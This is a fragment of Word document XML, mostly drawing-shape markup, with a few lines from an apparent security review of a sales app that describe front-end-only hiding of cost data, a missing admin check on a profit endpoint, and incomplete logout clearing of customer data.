                                  <a:pt x="869406" y="0"/>
                                  <a:pt x="871651" y="930"/>
                                  <a:pt x="873511" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="875371" y="4651"/>
                                  <a:pt x="876301" y="6896"/>
                                  <a:pt x="876301" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="876301" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="876301" y="126454"/>
                                  <a:pt x="875371" y="128699"/>
                                  <a:pt x="873511" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="871651" y="132420"/>
                                  <a:pt x="869406" y="133350"/>
                                  <a:pt x="866776" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="1" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="930" y="4651"/>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72" name="Shape 1872"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="323851" y="171450"/>
                            <a:ext cx="1657350" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1657350" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1657350" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1657350" y="133350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6894" y="133350"/>
                                  <a:pt x="4649" y="132420"/>
                                  <a:pt x="2789" y="130559"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123826"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9524"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2789" y="2791"/>
                                </a:ln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80" name="Shape 1880"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="161925" y="609600"/>
                            <a:ext cx="1514475" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1514475" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1504950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1507581" y="0"/>
                                  <a:pt x="1509826" y="930"/>
                                  <a:pt x="1511685" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1513545" y="4651"/>
                                  <a:pt x="1514475" y="6896"/>
                                  <a:pt x="1514475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1514475" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1514475" y="126454"/>
                                  <a:pt x="1513545" y="128699"/>
                                  <a:pt x="1511685" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1509826" y="132420"/>
                                  <a:pt x="1507581" y="133350"/>
                                  <a:pt x="1504950"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84" name="Shape 1884"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="828675" y="781050"/>
                            <a:ext cx="809625" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="809625" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="800100" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="802730" y="0"/>
                                  <a:pt x="804975" y="930"/>
                                  <a:pt x="806835" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="808694" y="4651"/>
                                  <a:pt x="809625" y="6896"/>
                                  <a:pt x="809625" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="809625" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="809625" y="126454"/>
                                  <a:pt x="808694" y="128699"/>
                                  <a:pt x="806835" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="804975" y="132420"/>
                                  <a:pt x="802730" y="133350"/>
                                  <a:pt x="800100"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894" name="Shape 1894"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1209675"/>
                            <a:ext cx="923925" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="923925" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="914400" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="917030" y="0"/>
                                  <a:pt x="919275" y="930"/>
                                  <a:pt x="921135" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="922995" y="4651"/>
                                  <a:pt x="923925" y="6896"/>
                                  <a:pt x="923925" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="923925" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="923925" y="135979"/>
                                  <a:pt x="922995" y="138224"/>
                                  <a:pt x="921135" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="919275" y="141945"/>
                                  <a:pt x="917030" y="142875"/>
                                  <a:pt x="914400"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39" style="width:156pt;height:106.5pt;position:absolute;z-index:-2147483604;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:304.43pt;mso-position-vertical-relative:text;margin-top:-48.9725pt;" coordsize="19812,13525">
                <v:shape id="Shape 1861" style="position:absolute;width:6286;height:1333;left:3619;top:0;" coordsize="628650,133350" path="m9525,0l619125,0c621755,0,624000,930,625860,2791c627720,4651,628650,6896,628650,9525l628650,123825c628650,126454,627720,128699,625860,130559c624000,132420,621755,133350,619125,133350l9525,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126454,0,123825l0,9525c0,6896,930,4651,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1864" style="position:absolute;width:8763;height:1333;left:10572;top:0;" coordsize="876301,133350" path="m9526,0l866776,0c869406,0,871651,930,873511,2791c875371,4651,876301,6896,876301,9525l876301,123825c876301,126454,875371,128699,873511,130559c871651,132420,869406,133350,866776,133350l9526,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126454,1,123825l1,9525c0,6896,930,4651,2790,2791c4650,930,6895,0,9526,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1872" style="position:absolute;width:16573;height:1333;left:3238;top:1714;" coordsize="1657350,133350" path="m9525,0l1657350,0l1657350,133350l9525,133350c6894,133350,4649,132420,2789,130559l0,123826l0,9524l2789,2791c4649,930,6894,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1880" style="position:absolute;width:15144;height:1333;left:1619;top:6096;" coordsize="1514475,133350" path="m9525,0l1504950,0c1507581,0,1509826,930,1511685,2791c1513545,4651,1514475,6896,1514475,9525l1514475,123825c1514475,126454,1513545,128699,1511685,130559c1509826,132420,1507581,133350,1504950,133350l9525,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126454,0,123825l0,9525c0,6896,930,4651,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1884" style="position:absolute;width:8096;height:1333;left:8286;top:7810;" coordsize="809625,133350" path="m9525,0l800100,0c802730,0,804975,930,806835,2791c808694,4651,809625,6896,809625,9525l809625,123825c809625,126454,808694,128699,806835,130559c804975,132420,802730,133350,800100,133350l9525,133350c6895,133350,4650,132420,2790,130559c930,128699,0,126454,0,123825l0,9525c0,6896,930,4651,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1894" style="position:absolute;width:9239;height:1428;left:0;top:12096;" coordsize="923925,142875" path="m9525,0l914400,0c917030,0,919275,930,921135,2791c922995,4651,923925,6896,923925,9525l923925,133350c923925,135979,922995,138224,921135,140084c919275,141945,917030,142875,914400,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135979,0,133350l0,9525c0,6896,930,4651,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0880" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3618F814" wp14:editId="76F1EB2F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>330550</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="581025" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27441" name="Group 27441"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="581025" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="581025" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1887" name="Shape 1887"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="581025" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4651"/>
                                  <a:pt x="581025" y="6896"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="126467"/>
                                  <a:pt x="580095" y="128699"/>
                                  <a:pt x="578235" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="132420"/>
                                  <a:pt x="574130" y="133350"/>
                                  <a:pt x="571500" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>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41" style="width:45.75pt;height:10.5pt;position:absolute;z-index:-2147483593;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:26.0275pt;" coordsize="5810,1333">
                <v:shape id="Shape 1887" style="position:absolute;width:5810;height:1333;left:0;top:0;" coordsize="581025,133350" path="m9525,0l571500,0c574130,0,576375,930,578235,2791c580095,4651,581025,6896,581025,9525l581025,123825c581025,126467,580095,128699,578235,130559c576375,132420,574130,133350,571500,133350l9525,133350c6895,133350,4650,132420,2790,130559l0,123825l0,9525l2790,2791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Worse, the financial data was </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>already in the response</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and merely </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hidden  </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Reports.jsx</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337,420,518,…</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> conditionally render cost and margin columns, so an employee saw them in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DevTools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> regardless. And </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/sales/profit</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> was missing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>adminOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> entirely while the sidebar showed "Profit" only to admins, so it </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>looked</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> restricted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A47B36" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="265" w:right="16" w:hanging="251"/>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Logout cleared only two keys, leaving invoice drafts with customer PII, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grn_report_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing wholesale </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cost prices</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, and the cached service catalogue behind for the next cashier on a shared till.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4617A447" w14:textId="20CB2539" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="5"/>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1904" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39D854B3" wp14:editId="3B361CC9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>153082</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1914525" cy="657225"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27446" name="Group 27446"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1914525" cy="657225"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1914525" cy="657225"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1903" name="Shape 1903"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="752475" y="0"/>
                            <a:ext cx="866775" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="866775" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="857250" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="859880" y="0"/>
                                  <a:pt x="862125" y="930"/>
                                  <a:pt x="863985" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="865845" y="4651"/>
                                  <a:pt x="866775" y="6896"/>
                                  <a:pt x="866775" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="866775" y="135992"/>
                                  <a:pt x="865845" y="138224"/>
                                  <a:pt x="863985" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="862125" y="141945"/>
                                  <a:pt x="859880" y="142875"/>
                                  <a:pt x="857250"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18" name="Shape 1918"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="400050" y="342900"/>
                            <a:ext cx="1219200" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1219200" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1209675" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1212305" y="0"/>
                                  <a:pt x="1214550" y="930"/>
                                  <a:pt x="1216410" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1218270" y="4651"/>
                                  <a:pt x="1219200" y="6896"/>
                                  <a:pt x="1219200" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1219200" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1219200" y="135992"/>
                                  <a:pt x="1218270" y="138224"/>
                                  <a:pt x="1216410" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1214550" y="141945"/>
                                  <a:pt x="1212305" y="142875"/>
                                  <a:pt x="1209675"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21" name="Shape 1921"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="523875"/>
                            <a:ext cx="581025" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4651"/>
                                  <a:pt x="581025" y="6896"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="126467"/>
                                  <a:pt x="580095" y="128699"/>
                                  <a:pt x="578235" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="132420"/>
                                  <a:pt x="574130" y="133350"/>
                                  <a:pt x="571500" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>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24" name="Shape 1924"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1104900" y="523875"/>
                            <a:ext cx="809625" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="809625" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="800100" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="802730" y="0"/>
                                  <a:pt x="804975" y="930"/>
                                  <a:pt x="806835" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="808695" y="4651"/>
                                  <a:pt x="809625" y="6896"/>
                                  <a:pt x="809625" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="809625" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="809625" y="126467"/>
                                  <a:pt x="808695" y="128699"/>
                                  <a:pt x="806835" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="804975" y="132420"/>
                                  <a:pt x="802730" y="133350"/>
                                  <a:pt x="800100" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126467"/>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46" style="width:150.75pt;height:51.75pt;position:absolute;z-index:-2147483561;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:12.0537pt;" coordsize="19145,6572">
                <v:shape id="Shape 1903" style="position:absolute;width:8667;height:1428;left:7524;top:0;" coordsize="866775,142875" path="m9525,0l857250,0c859880,0,862125,930,863985,2791c865845,4651,866775,6896,866775,9525l866775,133350c866775,135992,865845,138224,863985,140084c862125,141945,859880,142875,857250,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135992,0,133350l0,9525c0,6896,930,4651,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 1918" style="position:absolute;width:12192;height:1428;left:4000;top:3429;" coordsize="1219200,142875" path="m9525,0l1209675,0c1212305,0,1214550,930,1216410,2791c1218270,4651,1219200,6896,1219200,9525l1219200,133350c1219200,135992,1218270,138224,1216410,140084c1214550,141945,1212305,142875,1209675,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135992,0,133350l0,9525c0,6896,930,4651,2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
